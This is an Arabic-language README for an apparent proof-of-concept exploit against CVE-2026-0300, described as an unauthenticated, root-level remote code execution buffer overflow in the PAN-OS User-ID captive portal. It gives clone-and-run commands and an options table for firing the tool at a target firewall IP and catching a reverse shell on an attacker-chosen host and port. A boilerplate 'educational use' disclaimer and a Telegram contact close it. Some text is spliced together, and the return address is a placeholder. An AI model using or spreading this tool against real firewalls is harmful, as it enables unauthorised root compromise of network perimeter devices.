
إثبات المفهوم لـ CVE-2026-0300، وهو تجاوز سعة المخزن المؤقت الحرج في بوابة User-ID الخاصة بـ PAN-OS مما يتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة بصلاحيات الجذر.
CVE-2026-0300 هي ثغرة فائض مخزن مؤقت عالية الخطورة تم تحديدها في بوابة مصادقة User-ID™ (البوابة الأسيرة) الخاصة بـ Palo Alto Networks PAN-OS. يوضح هذا المستودع البحثي المنطق التقني للثغرة، مع التركيز بشكل خاص على كيفية تمكن حزمة شبكة غير مصادق عليها من الوصول إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) بصلاحيات الجذر.
| الميزة | التفاصيل |
|---|
| معرف CVE | CVE-2026-0300 |
| درجة الخطورة | 9.3 (حرجة) |
| نوع الضعف | CWE-787: الكتابة خارج الحدود |
| متجه الهجوم | الشبكة (بدون مصادقة) |
| الصلاحيات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| البرامج المتأثرة | PAN-OS 12.1, 11.2, 11.1, 10.2 |
تحدث الثغرة عندما تفشل خدمة بوابة مصادقة User-ID في التحقق من طول البيانات الواردة قبل كتابتها في مخزن مؤقت للذاكرة.
socket و struct و argparse القياسية).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
تم تصميم هذه الأداة بواجهة سطر أوامر احترافية (CLI).
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| العلم | الاسم | الوصف | الافتراضي |
|---|---|---|---|
| -t | --target | (مطلوب) عنوان IP الهدف لجدار الحماية. | لا يوجد |
| -p | --port | المنفذ الذي تعمل عليه بوابة User-ID. | 6082 |
| -o | --offset | طول البايت للوصول إلى نقطة فائض الذاكرة. | 2048 |
| -r | --ret | عنوان الإرجاع بالنظام الست عشري. | 0xdeadbeef |
| -l | --lhost | عنوان IP للشل العكسي | عنوان IP الخاص بك |
| -L | --lport | منفذ المستمع الخاص بك | 4444 |
لأغراض تعليمية وبحثية مصرح بها فقط. الاختبار غير المصرح به ضد الأنظمة التي لا تملكها غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام لرمز البحث هذا. استخدمه بمسؤولية لتحسين الأمن العالمي. تم التطوير بواسطة: https://t.me/p3Nt3st3rsTAr تاريخ اكتشاف الثغرة: 07 مايو 2026